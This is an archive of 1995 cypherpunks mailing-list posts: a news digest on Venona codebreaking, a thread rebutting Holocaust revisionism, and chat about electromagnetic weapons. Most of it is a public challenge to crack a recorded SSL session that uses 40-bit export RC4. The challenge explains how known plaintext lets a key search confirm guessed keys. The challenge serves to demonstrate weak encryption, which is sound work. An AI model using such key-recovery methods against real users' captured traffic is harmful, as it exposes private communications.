MH0#G<19?81F68`&2D(!W$8/IF(IN$F5@)X0B!*W1`DW1"`;4PQ*I,E!MKPQT
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/

   

AR

%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%=%#%
"Government is not reason... it is force.  Like fire, it is a dangerous
servant and a fearful master."                      - George Washington
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Allen Robinson...................................sebaygo@intellinet.com
PGP public key AD022AA9   fingerprint 5A3BC05B2EC67724 F5664A20AEEAB07A





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 12 Jul 95 06:53:47 PDT
To: cypherpunks@toad.com
Subject: QED_jak
Message-ID: <199507121353.JAA23961@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   7-12-95. NYPaper:


   "U.S. Tells How It Found Soviets Sought A-Bomb: Discloses
   Clues That Led to Code-Breaking."

      The American intelligence establishment today unveiled
      one of its oldest secrets: how a small team of
      codebreakers found the first clues that the Soviet Union
      sought to steal the blueprints for the atomic bomb in
      World War II.  Using just brain power -- no computers,
      no stolen skeleton keys -- the cryptographers slowly
      cracked what was thought to be an unbreakable code. 
      Their work and the fact that they had broken the
      Soviets' seemingly impenetrable cipher, was until today
      one of the most tightly held secrets of the National
      Security Agency, the nation's electronic eavesdropping
      service.  The messages were like a jigsaw puzzle with a
      billion pieces -- all black. They had been double-coded
      by a system called a one-time pad -- a unique random
      code for each message, converting words to numbers in a
      pattern used only once.                        HOO_doo


   [Book review] "What Would Happen if E.T. Actually Called:
   The implications of finding other intelligence in the
   universe." 

      Mr. Davies is a supporter of the program called SETI,
      the search for extraterrestrial intelligence, which aims
      radio telescopes at thousands of target star systems to
      try to detect communications from extraterrestrial
      civilizations. He argues that if we do pick up any
      signals, or even if we just determine that there is a
      single microorganism out there that formed independently
      of earthly contamination, this "would drastically alter
      our world view and change our society as profoundly as
      the Copernican and Darwinian revolutions." It would be,
      Mr. Davies writes, nothing less than "the greatest
      scientific discovery of all time."             ETT_eeg


   "AT&T Expected to Buy Stake In an Internet Access Provider

      Cementing its recent link with one of the country's
      largest corporate Internet access providers, the AT&T
      Corporation will spend $8 million to buy a stake in the
      BBN Planet Corporation, according to an executive
      familiar with the company's plans.             BBN_bye



   3x Pad: QED_jak










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Strawser <feanor@anduin.gondolin.org>
Date: Wed, 12 Jul 95 08:04:24 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
In-Reply-To: <199507121418.AA21899@bear-gate.bear.com>
Message-ID: <199507121455.JAA12032@anduin.gondolin.org>
MIME-Version: 1.0
Content-Type: text


> > 	The Leuter report?  Leuter was a local moron who claimed to be
> > an engineer.  He wrote a report claiming to prove that the gas
> > chambers somewhere were too small to kill many people.
> 
> For the record: It's Leuchter, Fred Leuchter.

there is a good accounting of Leuchter's work in "The Execution 
Protocol", an examination of Missouri's death penalty process.  I can 
get the ISBN number if anyone is interested.  It was also made into a 
documentary by Discovery.

Bryan



-- 
Bryan Strawser, Gondolin Technologies, Bloomington, IN USA        Remember Waco
feanor@gondolin.org                                            Live free or die



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 08:00:17 PDT
To: perry@imsi.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121444.AA10523@snark.imsi.com>
Message-ID: <doug-9506121459.AA0062320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Hmm.. I'm not sure I'd want to stand too close when one of those
things goes off, but it would be an interesting demo. :)

Maybe behind an EM shield.. ;) 
I think there was a question of some microelectronics being permenently
damaged because of fusion at the MOS level (burning through the gate), so
it might have to be a disposable machine in a place where no other machines
are near. It would depend on the magnitude of the charge (and hence cost
of the weapon). It might take a very expensive one to do this, or maybe
not...

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@bear.com (David Mandl)
Date: Wed, 12 Jul 95 07:19:09 PDT
To: cypherpunks@toad.com
Subject: Re: FW: Edupage 7/9/95 (fwd)
Message-ID: <199507121418.AA21899@bear-gate.bear.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack <adam@bwh.harvard.edu> wrote:

> | And the nazi pages were written in english. The pages were named
> | after the author of the pages (something like 'The XY report', where
> | XY was the authors name, but I can't remember it. The author was
> | an american).
> 
> 	The Leuter report?  Leuter was a local moron who claimed to be
> an engineer.  He wrote a report claiming to prove that the gas
> chambers somewhere were too small to kill many people.

For the record: It's Leuchter, Fred Leuchter.
 
> 	The Commonwealth of Mass brought him to court several years
> ago for "practicing engineering without a license."  A good rebuttal
> of his report was written up by (I think) William McVey, in Canada.
> Ask in talk.politics.mideast, or soc.history.revisionist or something.

Ken McVay.  And dozens of other people too.  The newsgroup is
alt.revisionism.  If you've got any interest in the "holocaust
revisionism" phenomenon, it's well worth at least a brief look in
there.

Incidentally, I would say that this is one of the best uses of the
net I've ever seen.  This particular brand of neo-nazism is tricky:
in their case, it really is true that there's no such thing as bad
press.  Any exposure they get on TV, the radio, or in print media
helps their cause, because of the inherent limitations of those
media.  They can throw up smokescreens, spew out blatantly false
"facts" that sound plausible but can't be confirmed or denied then
and there, put on the "we're just skeptics who feel that these
questions need to answered even though they're controversial" act,
etc.  Very difficult to counter, given the strict limitations on
time and resources of live broadcasts.

But on the net, where claims can be researched and repudiated and
responses "broadcast" almost immediately, and where people have all
the time in the world to debate these issues, these guys get
absolutely trounced every day.  They make a claim, it gets blown to
smithereens instantly by a dozen people with access to university
libraries and scanned photos, and the revisionists crawl away for a
while.  Then they come back a month later and start again.  It gets
kind of old after a while, but's fascinating to see (especially for
those naive young people to whom the revisionists seem "reasonable").

Even for a part-time Luddite like me, this is an excellent
demonstration of how the net is in many ways fundamentally different
from traditional print and broadcast media.

> 	I have no idea why this thread is still on cypherpunks, unless
> its an experiment in text stego.

Well, I hope my little digression above is at least slightly relevant.

   --Dave.
--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or 
agreement or any information about any transaction, customer account or account 
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Wed, 12 Jul 95 08:16:11 PDT
To: perry@imsi.com
Subject: Re: Don't trust the net too much
In-Reply-To: <9507121505.AA10601@snark.imsi.com>
Message-ID: <doug-9506121515.AA0064320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



>
>Doug Hughes writes:
>> 
>> Hmm.. I'm not sure I'd want to stand too close when one of those
>> things goes off, but it would be an interesting demo. :)
>> 
>> Maybe behind an EM shield.. ;) 
>
>What is it, exactly, that you imagine could happen to you? You realize
>that you can expose humans to pretty powerful electromagnetic fields
>without any noticable effect unless the frequency happens to be one
>that their tissues absorb.
>
I'm thinking better safe than sorry. None of the studies on EM fields
and their effects on humans are causal, but a lot of studies and advice
have concluded that caution and minimization may be advisable.
 It's the un-noticable effects that I'm worried about. ;)

>> I think there was a question of some microelectronics being permenently
>> damaged because of fusion at the MOS level (burning through the
>> gate),
>
>To do that requires that you transfer energy from your device into the
>computer you are attacking. How do you propose to do that?
>

Just relating what I thought I'd heard. It may be wrong, or I may be
remembering it wrong. My EM theory is a bit rusty.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 12 Jul 95 10:23:37 PDT
To: cypherpunks@toad.com
Subject: SSL RC4 challenge
Message-ID: <199507121722.KAA19834@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Here is a challenge to try breaking SSL using the default exportable
encryption mode, 40-bit RC4.  It consists of a record of a submission
of form data which was sent to Netscape's electronic shop order form in
"secure" mode.  However the data I entered in the form is not my real
name and address.  The challenge is to break the encryption and recover
the name and address info I entered in the form and sent securely to
Netscape.

(A URL for info on SSL is http://home.netscape.com/newsref/std/SSL.html.)

Below is the data which was sent back and forth, along with some
annotations to help interpret it.  The connection was made to
order.netscape.com at port 443, the https port.

The following is the first message from client to server, the
CLIENT-HELLO message.  It is not encrypted.

0x80 0x1c 0x01 0x00 0x02 0x00 0x03 0x00 0x00 0x00 0x10 0x02 0x00 0x80 0xaf 0x84
0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75 0x51 

This is interpreted as follows:

0x80 0x1c	Length field: 28 bytes follow in the packet.
0x01		MSG_CLIENT_HELLO
0x00 0x02	CLIENT-VERSION-MSB CLIENT-VERSION-LSB
0x00 0x03	CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x00	SESSION-ID-LENGTH-MSB SESSION-ID-LENGTH-LSB
0x00 0x10	CHALLENGE-LENGTH-MSB CHALLENGE-LENGTH-LSB
0x02 0x00 0x80	CIPHER-SPECS-DATA
<none>		SESSION-ID-DATA
0xaf...0x51	CHALLENGE-DATA [16 bytes]

The only cipher spec sent (and hence supported) by the browser is
0x02 0x00 0x80, which is SSL_CK_RC4_128_EXPORT40_WITH_MD5.  No session id
is sent, hence new key information will be calculated for this session.
And 16 bytes of challenge data are sent in the clear; this will be useful
as known plaintext returned encrypted by the server later.

The following data is then returned by the server, in the SERVER-HELLO
message:

0x82 0x2b 0x04 0x00 0x01 0x00 0x02 0x02 0x0d 0x00 0x03 0x00 0x10 0x30 0x82 0x02
0x09 0x30 0x82 0x01 0x72 0x02 0x02 0x00 0x88 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48
0x86 0xf7 0x0d 0x01 0x01 0x04 0x05 0x00 0x30 0x47 0x31 0x0b 0x30 0x09 0x06 0x03
0x55 0x04 0x06 0x13 0x02 0x55 0x53 0x31 0x10 0x30 0x0e 0x06 0x03 0x55 0x04 0x0b
0x13 0x07 0x54 0x65 0x73 0x74 0x20 0x43 0x41 0x31 0x26 0x30 0x24 0x06 0x03 0x55
0x04 0x0a 0x13 0x1d 0x4e 0x65 0x74 0x73 0x63 0x61 0x70 0x65 0x20 0x43 0x6f 0x6d
0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73 0x20 0x43 0x6f 0x72 0x70
0x2e 0x30 0x1e 0x17 0x0d 0x39 0x35 0x30 0x32 0x32 0x34 0x30 0x31 0x30 0x39 0x32
0x34 0x5a 0x17 0x0d 0x39 0x37 0x30 0x32 0x32 0x33 0x30 0x31 0x30 0x39 0x32 0x34
0x5a 0x30 0x81 0x97 0x31 0x0b 0x30 0x09 0x06 0x03 0x55 0x04 0x06 0x13 0x02 0x55
0x53 0x31 0x13 0x30 0x11 0x06 0x03 0x55 0x04 0x08 0x13 0x0a 0x43 0x61 0x6c 0x69
0x66 0x6f 0x72 0x6e 0x69 0x61 0x31 0x16 0x30 0x14 0x06 0x03 0x55 0x04 0x07 0x13
0x0d 0x4d 0x6f 0x75 0x6e 0x74 0x61 0x69 0x6e 0x20 0x56 0x69 0x65 0x77 0x31 0x2c
0x30 0x2a 0x06 0x03 0x55 0x04 0x0a 0x13 0x23 0x4e 0x65 0x74 0x73 0x63 0x61 0x70
0x65 0x20 0x43 0x6f 0x6d 0x6d 0x75 0x6e 0x69 0x63 0x61 0x74 0x69 0x6f 0x6e 0x73
0x20 0x43 0x6f 0x72 0x70 0x6f 0x72 0x61 0x74 0x69 0x6f 0x6e 0x31 0x16 0x30 0x14
0x06 0x03 0x55 0x04 0x0b 0x13 0x0d 0x4f 0x6e 0x6c 0x69 0x6e 0x65 0x20 0x4f 0x72
0x64 0x65 0x72 0x73 0x31 0x15 0x30 0x13 0x06 0x03 0x55 0x04 0x03 0x13 0x0c 0x41
0x72 0x69 0x20 0x4c 0x75 0x6f 0x74 0x6f 0x6e 0x65 0x6e 0x30 0x5a 0x30 0x0d 0x06
0x09 0x2a 0x86 0x48 0x86 0xf7 0x0d 0x01 0x01 0x01 0x05 0x00 0x03 0x49 0x00 0x30
0x46 0x02 0x41 0x00 0xa5 0xa7 0x7b 0x42 0xb1 0x79 0x2d 0x0b 0x35 0x08 0xb4 0x0d
0x74 0x1d 0x46 0x6a 0x29 0x07 0x47 0x08 0xdc 0x3a 0x76 0x36 0xbd 0x7f 0xb3 0xd4
0xa9 0x85 0x9d 0x4b 0x65 0x74 0xc1 0x00 0x56 0xec 0x5a 0x31 0x72 0x23 0x04 0xc1
0xcf 0x78 0x63 0x21 0x77 0x69 0xd9 0xf0 0x61 0xc8 0x73 0xf7 0xdc 0x4c 0xde 0xd2
0x22 0x99 0x79 0xdf 0x02 0x01 0x03 0x30 0x0d 0x06 0x09 0x2a 0x86 0x48 0x86 0xf7
0x0d 0x01 0x01 0x04 0x05 0x00 0x03 0x81 0x81 0x00 0x7e 0x4a 0x28 0x7d 0xba 0xfa
0x41 0x5a 0x19 0x1c 0x9a 0xea 0x6d 0x3b 0x07 0x1c 0x97 0xe0 0xf5 0xf8 0x4c 0xd5
0x92 0x0c 0x1c 0x30 0x49 0x06 0x72 0x42 0x9a 0x3f 0xfc 0x3b 0x11 0x17 0x78 0x7e
0x6c 0x27 0x8a 0x12 0x19 0xf3 0x08 0x18 0x6e 0xe0 0xc3 0xbe 0xe7 0x37 0xbd 0x4e
0xae 0xe1 0x9e 0x4a 0x3b 0xa9 0xbf 0xc0 0x92 0x59 0x2c 0xdb 0x37 0x34 0xc8 0xa0
0xc0 0xba 0xb8 0x6f 0xd3 0xd6 0xc7 0x48 0x88 0xbc 0xd6 0xff 0x7a 0xf7 0x76 0x70
0x2c 0x19 0x07 0xc8 0x7c 0x80 0x29 0x18 0x58 0xfc 0xd1 0x12 0x86 0x99 0x4e 0x32
0xee 0xb9 0xf5 0x11 0x70 0xd5 0x1b 0xf7 0x85 0x5b 0x4a 0x0e 0xd6 0xe6 0x6c 0x52
0xf5 0x8a 0x2c 0x97 0x3e 0x63 0x85 0x57 0x43 0xbc 0x02 0x00 0x80 0xbf 0xeb 0x90
0xf8 0x2c 0x0c 0xe1 0xea 0x18 0xac 0x11 0x4c 0x83 0x14 0x21 0xb6 

This is interpreted as follows:

0x82 0x2b	Packet length, 555 bytes follow.
0x04		MSG-SERVER-HELLO
0x00		SESSION-ID-HIT
0x01		CERTIFICATE-TYPE
0x00 0x02	SERVER-VERSION-MSB SERVER-VERSION-LSB
0x02 0x0d	CERTIFICATE-LENGTH-MSB CERTIFICATE-LENGTH-LSB
0x00 0x03	CIPHER-SPECS-LENGTH-MSB CIPHER-SPECS-LENGTH-LSB
0x00 0x10	CONNECTION-ID-LENGTH-MSB CONNECTION-ID-LENGTH-LSB
0x30...0xbc	CERTIFICATE-DATA [525 bytes]
0x02 0x00 0x80	CIPHER-SPECS-DATA
0xbf...0xb6	CONNECTION-ID-DATA [16 bytes]

Most of the packet is the certificate.  SESSION-ID-HIT is 0 since no
session ID was sent by the client.  After the 525 (0x020d) bytes of
certificate comes the 3 byte code for 40 bit RC4, then the 16 byte
connection ID.  The main importance of the connection ID data here
is that it helps to calculate the session keys as described below.

The next message, from the client to the server, is the CLIENT-MASTER-KEY
sent mostly in the clear:

0x80 0x55 0x02 0x02 0x00 0x80 0x00 0x0b 0x00 0x40 0x00 0x00 0x0e 0x89 0x94 0xb8
0xbf 0x0e 0xb9 0x2e 0x50 0x44 0x07 0x8c 0x52 0xeb 0xef 0x44 0xc1 0x01 0x4b 0xc1
0x02 0xd2 0x2e 0x37 0x1f 0x1d 0x54 0xc2 0x83 0x45 0x79 0x6b 0xc8 0xe3 0x85 0x17
0xb8 0xd4 0x84 0xc6 0x9f 0xb1 0x6a 0x03 0x2e 0x97 0xae 0x82 0x75 0x10 0xf0 0x7b
0x5f 0x25 0x7b 0x88 0x75 0xc6 0x7a 0x33 0x5f 0xd6 0x96 0x99 0x94 0xd0 0x7a 0x78
0xae 0x50 0x32 0x1a 0xbb 0x66 0x50 

It is interpreted as follows:

0x80 0x55	Packet length, 85 bytes follow.
0x02		MSG-CLIENT-MASTER-KEY
0x02 0x00 0x80	CIPHER-KIND
0x00 0x0b	CLEAR-KEY-LENGTH-MSB CLEAR-KEY-LENGTH-LSB
0x00 0x40	ENCRYPTED-KEY-LENGTH-MSB ENCRYPTED-KEY-LENGTH-LSB
0x00 0x00	KEY-ARG-LENGTH-MSB KEY-ARG-LENGTH-LSB
0x0e...0x07	CLEAR-KEY-DATA [11 bytes]
0x8c...0x50	ENCRYPTED-KEY-DATA [64 bytes]
<none>		KEY-ARG-DATA

The 11 most significant bytes (88 bits) of "master key" information are
sent in the clear as the CLEAR-KEY-DATA.  The remaining 40 low-order
bits of the 128-bit master key are RSA encrypted using the server's
public key, expanding in the process to 64 bytes, and sent as the
ENCRYPTED-KEY-DATA.  No KEY-ARG-DATA is sent since RC4 doesn't need an
initialization vector.

Now that these packets have been exchanged, from this point on, all
packets are sent encrypted.  For each such packet, after the packet
length bytes there is a 16-byte Message Authentication Code (MAC).
Then comes the RC4 encrypted data itself.

Two different session keys are used, both generated from the master key,
the 16-byte challenge data, and the 16-byte connection ID data.  The
CLIENT-READ-KEY, used for data sent from server to client, is calculated
as:

	MD5 (MASTER-KEY, "0", CHALLENGE, CONNECTION-ID).

"0" is one byte of 0x30, ascii 0.

The CLIENT-WRITE-KEY, used for data sent from client to server, is
calculated as:

	MD5 (MASTER-KEY, "1", CHALLENGE, CONNECTION-ID).

"1" is one byte of 0x31, ascii 1.

MD5 produces 128 bits of output which are used directly as the key input
to the RC4 algorithm.

The next message, from server to client, is SERVER-VERIFY.  It is sent
encrypted:

0x80 0x21 0x37 0x68 0x3a 0x8c 0x7d 0x33 0xb2 0x2f 0xb9 0x66 0xeb 0xd2 0x63 0xcd
0xa7 0xed 0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58
0xbc 0xf0 0xf4 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0x37...0xed	MAC [16 bytes]
0x71		RC4 encrypted MSG-SERVER-VERIFY (0x05)
0xa0...0xf4	RC4 encrypted CHALLENGE-DATA from CLIENT-HELLO message
		[16 bytes]

The first RC4 encrypted byte is MSG-SERVER-VERIFY (which has a value of
0x05).  This is followed by 16 bytes of challenge data from the first
client message, encrypted.  These 17 bytes represent known plaintext
which can be used to easily check any guessed RC4 CLIENT-READ-KEY.

Let me make this a little more clear.  The first RC4 encryption with the
CLIENT-READ-KEY, immediately after key setup, is as follows:

Plaintext (MSG-SERVER-VERIFY plus CHALLENGE-DATA):

0x05 0xaf 0x84 0xa7 0x79 0xf8 0x13 0x69 0x20 0x25 0x9b 0x53 0xa0 0x60 0xae 0x75
0x51 

Ciphertext (from SERVER-VERIFY packet):

0x71 0xa0 0xb6 0x2f 0xb6 0xe2 0x31 0xa4 0x2a 0x81 0xd3 0x25 0x61 0x58 0xbc 0xf0
0xf4 

The next message in the protocol is CLIENT-FINISHED, sent encrypted from
client to server:

0x80 0x21 0xed 0x59 0x0a 0x2a 0x80 0x50 0x42 0xec 0xcd 0xed 0x6c 0x96 0x0a 0xab
0x5c 0x0e 0xed 0x55 0xc3 0x21 0x6e 0x34 0x26 0x5b 0x46 0x41 0x35 0x51 0xb7 0xaa
0xec 0x57 0x9f 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0xed...0x0e	MAC [16 bytes]
0xed		RC4 encrypted MSG-CLIENT-FINISHED (0x03)
0x55...0x9f	RC4 encrypted CONNECTION-ID from SERVER-HELLO [16 bytes]

This is the first message sent encrypted with the CLIENT-WRITE-KEY and
could also be used as known plaintext to check a guessed key.

The next message is SERVER-FINISHED, sent encrypted from server to
client:

0x80 0x21 0x79 0x84 0xc6 0xb6 0xde 0xf4 0x4c 0xd2 0x52 0x56 0xdc 0x58 0x23 0xa0
0xfa 0x4d 0x06 0x7d 0x4c 0x12 0x32 0x32 0xea 0xaa 0x5a 0xb6 0xa7 0xb8 0x1a 0x66
0xeb 0x65 0x56 

This is interpreted as follows:

0x80 0x21	Packet length, 33 bytes follow
0x79...0x4d	MAC [16 bytes]
0x06		RC4 encrypted MSG-SERVER-FINISHED (0x06)
0x7d...0x56	RC4 encrypted SESSION-ID-DATA [16 bytes]

The SESSION-ID-DATA has not been previously sent in the clear.  It would
be used to cache the key info for a future session.

From here on out, the handshaking is done.  Every message sent will be
encrypted and packetized.  The first two bytes are packet length, then
16 bytes of MAC, then the data.

First data message from client to server.  Presumably it is an http "GET"
request, with form information embedded in the URL.  This is the main one
to try decrypting (starting with 0x6b as the first encrypted byte).

0x82 0xf8 0x07 0x97 0xef 0x99 0x66 0x45 0x48 0x22 0xe4 0xdc 0x31 0xe4 0xf9 0x0b
0xb9 0x98 0x6b 0x99 0x2a 0x09 0x29 0xae 0xa6 0x8d 0xbf 0xb0 0xd3 0xa6 0x83 0xec
0x69 0x1c 0xcc 0x11 0x66 0x84 0x21 0x77 0xfb 0x86 0x73 0x10 0xfb 0xa9 0xe3 0x3b
0x2f 0xd4 0x0f 0xb9 0xbd 0x3f 0xa4 0x0b 0x41 0xd5 0xc9 0x90 0x6d 0xa7 0x34 0x7a
0x5a 0xc1 0x69 0x8d 0xe9 0x64 0xad 0x0d 0xa8 0xae 0x91 0xd1 0xa6 0x70 0xac 0xf9
0xe6 0x11 0x38 0xa0 0xa7 0xd9 0x7c 0xc7 0x18 0x17 0xe2 0x0d 0x8d 0x30 0xb0 0x1c
0x22 0x25 0xa3 0x61 0xee 0xa2 0xca 0xe5 0xf8 0x20 0x5b 0xe1 0x58 0xcf 0xa5 0x21
0xe3 0x23 0xa6 0xfb 0xf6 0x2b 0xba 0x69 0xca 0xa3 0xe6 0x4a 0x47 0x4c 0x77 0xb8
0xc2 0x93 0x8e 0xb7 0x5d 0x17 0x06 0x57 0x19 0x6e 0x00 0x34 0xd6 0xc5 0x64 0x5e
0x23 0x60 0x03 0xf9 0xb2 0x9d 0xee 0xb4 0x83 0x28 0xae 0xfe 0xbb 0xb0 0xe3 0x49
0xfc 0x8f 0x68 0x24 0x51 0x03 0x26 0x8f 0x2b 0xcd 0xc1 0x0c 0x6d 0x79 0xed 0xc4
0x7f 0x3a 0x1e 0x2a 0xc5 0x4e 0xd8 0xe9 0x35 0x27 0xb7 0xde 0x50 0xc3 0xac 0x49
0x84 0x55 0x90 0xa6 0x44 0xcb 0xf7 0xfc 0x69 0xb4 0x19 0xea 0xb6 0xf0 0x72 0x37
0xef 0xfc 0xdf 0x20 0xaf 0x34 0x10 0xa8 0xf9 0xc2 0x74 0xa8 0x64 0xb2 0xd5 0xe9
0x25 0xd8 0xf2 0xca 0xf6 0xb6 0xa0 0x35 0x6f 0x3c 0x6c 0x4c 0xc6 0x99 0x4e 0x51
0xc4 0x5c 0x32 0x8e 0x0b 0x7c 0x59 0x7b 0xda 0x19 0x3f 0x89 0x7b 0xd3 0x33 0x9c
0x2d 0x20 0x46 0x59 0x26 0xb4 0x20 0x61 0x54 0x49 0xb8 0x71 0xa4 0xde 0x2b 0x7b
0xf3 0xdd 0xb2 0x64 0xa1 0x1a 0x39 0x4b 0x50 0x20 0x21 0x6a 0x9c 0x3d 0x34 0xaf
0x91 0xf4 0x2e 0xe1 0x4c 0x74 0x6a 0xed 0x4e 0x18 0x3d 0x11 0xe5 0xa9 0xf6 0x87
0xb3 0x7a 0xf0 0xf1 0x5e 0x9b 0x9c 0x1f 0xc0 0x44 0x72 0xdc 0xc3 0xe9 0x62 0x88
0x0b 0xec 0x3c 0x71 0x29 0x99 0xac 0xfa 0x1f 0x31 0xdd 0xae 0x5f 0x84 0x3c 0x16
0x04 0xdb 0x9d 0x4b 0xbb 0xdf 0x6c 0x32 0x0e 0xa0 0xe7 0xa0 0xdc 0x6a 0xa5 0x49
0x12 0xd7 0x59 0xce 0x3c 0x5d 0x36 0x46 0xbf 0x0b 0xcb 0xf7 0x0e 0x41 0x50 0x37
0x53 0xb5 0xdf 0x6d 0xc0 0x7e 0x7f 0x35 0x75 0xf5 0xec 0xad 0x40 0xb5 0x69 0x3c
0xb7 0x5c 0x44 0x0b 0x48 0xe6 0x07 0x41 0xb8 0x4c 0x9d 0x2c 0x4c 0xdf 0xf3 0xa7
0x15 0xcf 0x12 0xdd 0x11 0xcb 0xeb 0x3b 0x89 0x11 0x2e 0x6b 0x84 0x1a 0x3d 0xd9
0x25 0xa2 0x51 0xed 0xdf 0x93 0x76 0x86 0xc4 0xa4 0xcb 0xe8 0x5c 0xd8 0x7a 0x41
0x7d 0xc8 0x70 0xa1 0x0c 0xa1 0xd8 0xda 0xe2 0x75 0x05 0x0b 0x0b 0x83 0x3c 0x6c
0x71 0x13 0x42 0x19 0xcd 0x5d 0xd0 0x99 0x7b 0x24 0xc9 0x7b 0xc2 0x1c 0x2e 0x6e
0x78 0xe0 0xad 0x7f 0x7b 0x4b 0x50 0x33 0x7e 0xa0 0xb9 0x93 0xf4 0x75 0x39 0x50
0x41 0x41 0xe3 0x2b 0x0f 0xf1 0xf3 0xbc 0x84 0x9d 0x6f 0xa7 0x27 0xa7 0x58 0x55
0x8d 0xc7 0xf1 0xa1 0xb8 0x60 0x6f 0x0f 0x19 0xac 0xea 0xef 0x2c 0xba 0x90 0x9b
0x79 0x7b 0x61 0x54 0x03 0xf6 0x92 0x10 0xb4 0x9c 0x78 0x85 0xf3 0x7b 0x3f 0x0e
0xf9 0x8e 0x3d 0xa3 0x43 0xab 0xf4 0x33 0xa4 0x55 0x4b 0x86 0x50 0x75 0x93 0x3a
0x50 0x24 0xae 0x70 0x0c 0xde 0xa7 0x52 0x28 0x43 0x07 0x35 0x5c 0x5a 0xeb 0xc0
0xe1 0xba 0x8c 0xcd 0x76 0xdc 0x07 0x1f 0xa4 0x57 0xdd 0x18 0xa3 0x4e 0xc3 0xf3
0x7b 0x2d 0x0e 0x6b 0xb9 0x92 0xc1 0xfb 0x54 0xc8 0xd7 0x33 0x31 0x43 0xe1 0xce
0xb5 0x89 0xbd 0x0d 0x4e 0x14 0xbc 0x64 0xc5 0xf6 0x28 0x58 0x84 0x64 0xe7 0x8c
0xb2 0xa9 0xd2 0x0b 0x9f 0x1c 0x28 0xfd 0x95 0x93 0x8e 0x51 0x9a 0x5b 0xeb 0x0d
0x51 0x60 0x93 0x35 0x7c 0x59 0x7d 0x6f 0x37 0xbd 0xa4 0x9b 0x2d 0x4f 0x75 0x92
0xbe 0x85 0xc6 0xc3 0x68 0xf6 0x41 0xcc 0x51 0x4c 0xfc 0xda 0x21 0xc3 0x77 0xc1
0xe2 0x79 0xe8 0x0d 0xc7 0x26 0xc3 0x14 0x9e 0x48 0x2f 0xa4 0x95 0x21 0x24 0x61
0x31 0xd5 0x3b 0x14 0x42 0x45 0xd1 0x6d 0x90 0xfe 0x72 0x28 0xa7 0x81 0xe9 0x07
0x47 0x8a 0x0d 0xda 0x08 0x99 0xbc 0x76 0x42 0xec 0x0b 0xfd 0xeb 0x69 0x47 0x58
0xd7 0x81 0x6b 0x71 0xf6 0xb6 0xbe 0xcd 0x4e 0x29 0xd9 0xdb 0xc8 0x12 0x5c 0x46
0xa0 0x3c 0x5b 0x57 0x2b 0x59 0x92 0x36 0x3c 0x6a 0xc3 0x4a 0x13 0x41 0x34 0x2f
0x12 0x13 0xa2 0x51 0xfb 0xf2 0xe0 0x0b 0x2f 0xfc 0x14 0x25 0xad 0x60 0x3a 0x35
0x62 0x7e 0xd2 0x11 0x4c 0x4a 0x29 0xa4 0xca 0x44 

This is the first data packet response from the server:

0x80 0x84 0x16 0xc9 0xe0 0x80 0xd6 0x0b 0x4e 0xd8 0xfe 0x00 0xce 0xe2 0x07 0xe1
0xec 0xb9 0x03 0xa8 0x51 0x0b 0xc9 0xd5 0xd9 0x27 0x59 0x07 0x83 0x0c 0x2b 0x75
0x24 0x50 0xcf 0x0c 0xd2 0x8e 0x7b 0xbc 0xbe 0x65 0x48 0x23 0xc9 0xdb 0x82 0x2f
0x54 0x50 0x3b 0xf2 0x50 0xd3 0x15 0x30 0xec 0x78 0xa2 0x61 0x09 0x9a 0x2a 0xc8
0x9c 0x07 0x67 0x70 0x44 0x46 0xca 0xe4 0x65 0x1a 0x0e 0xd9 0x2a 0x77 0xeb 0xc1
0x7e 0x37 0x83 0x43 0x2e 0x26 0xde 0x5f 0x9d 0xa3 0x31 0x87 0xf2 0xe1 0x4f 0x67
0x8d 0xfc 0x4f 0x3f 0x00 0x2c 0x40 0x70 0x34 0x2b 0x62 0x80 0xcf 0x0d 0x93 0xff
0xc9 0x5e 0xd2 0x21 0xf6 0xa4 0xf4 0xd7 0x13 0x13 0x59 0x44 0x6c 0xd1 0xd1 0x05
0x8f 0x5f 0x15 0x10 0x08 0xed 

Here is the second data packet response from the server:

0x81 0x04 0xc9 0x4c 0x54 0xcb 0x2c 0xe0 0x8e 0xf9 0x13 0x31 0xb4 0xf1 0x82 0x92
0xd3 0x65 0xc9 0x45 0x7e 0x0f 0x8e 0x54 0x4f 0x7f 0x35 0xc8 0x20 0xa8 0x55 0x18
